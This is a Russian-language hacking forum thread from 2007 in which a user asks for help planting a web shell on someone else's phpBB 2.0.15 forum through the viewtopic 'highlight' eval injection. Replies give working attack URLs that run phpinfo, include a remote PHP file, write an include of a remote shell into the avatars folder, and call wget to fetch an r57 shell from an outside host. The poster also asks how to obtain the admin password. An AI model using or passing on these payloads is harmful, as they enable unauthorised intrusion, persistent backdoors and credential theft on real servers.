phpBB платформа WIND помогите с shell

Discussion in 'Песочница' started by Student :), 14 Feb 2007.

  1. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    ДОрогие друзья я нашол форум с дырой
    по запросу
    http://сайт/forum/viewtopic.php?t=161&cmd=phpinfo();&highlight='.eval($HTTP_GET_VARS[cmd]).'
    phpinfo выдал
    система System Windows NT SUPPORT 5.0 build 2195
    FTP support enabled
    PATH_TRANSLATED D:\www\www2\forum\viewtopic.php
    SystemRoot C:\WINNT
    TEMP C:\WINNT\TEMP
    TMP C:\WINNT\TEMP
    USERPROFILE C:\Documents and Settings\Default User
    windir C:\WINNT

    MySQL Support enabled
    Active Persistent Links 0
    Active Links 1
    Client API version 3.23.49


    возможно ли залить шелл и если да то как помогите пожалуйста :)
     
  2. x0x01

    x0x01 Elder - Старейшина

    Joined:
    19 Oct 2006
    Messages:
    32
    Likes Received:
    6
    Reputations:
    1
    это тебе поможет ;) хттп://exploit.in/forum/index.php?showtopic=5165
     
  3. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    А если попробывать такой командой?
    http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
     
  4. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    к сожелению команда http://site/forum/viewtopic.php?t=161&cmd=http://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt&highlight='.include($HTTP_GET_VARS[cmd]).'
    не работает :(
     
  5. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ты можешь команды чтоль на сервере исполнять или что?
     
  6. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    пробуй сразу
    http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

    либо для твоего случая можно попробовать в папку с авами закинуть

    http://сайт/forum/viewtopic.php?t=161&cmd=echo ^<? @include(http://site.ru/youshell.php); ?^> >> D:\www\www2\forum\images\avatars\fuck.php&highlight='.eval($HTTP_GET_VARS[cmd]).'

    обязательно с символом ^
    если что не получится пиши сюда.
     
    _________________________
  7. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    Спосибо тебе за ответ! но я всё перепробывал что ты сказал пишет
    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
     
  8. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    может кто поможет, главное phpinfo работает!
    моя icq 997-253
     
  9. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    а можно хотябы узнать пароль админа на форум ?
     
  10. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    А какая версия форума?
     
  11. Student :)

    Student :) Elder - Старейшина

    Joined:
    9 Feb 2007
    Messages:
    278
    Likes Received:
    18
    Reputations:
    -15
    версия форума phpbb 2.0.15
     
  12. k3pch3

    k3pch3 New Member

    Joined:
    6 Nov 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://сайт/forum/viewtopic.php?t=161&cmd=wget http://pathofshell//r57.txt;&highlight='.eval($HTTP_GET_VARS[cmd]).'


    paprobay vot tak ;)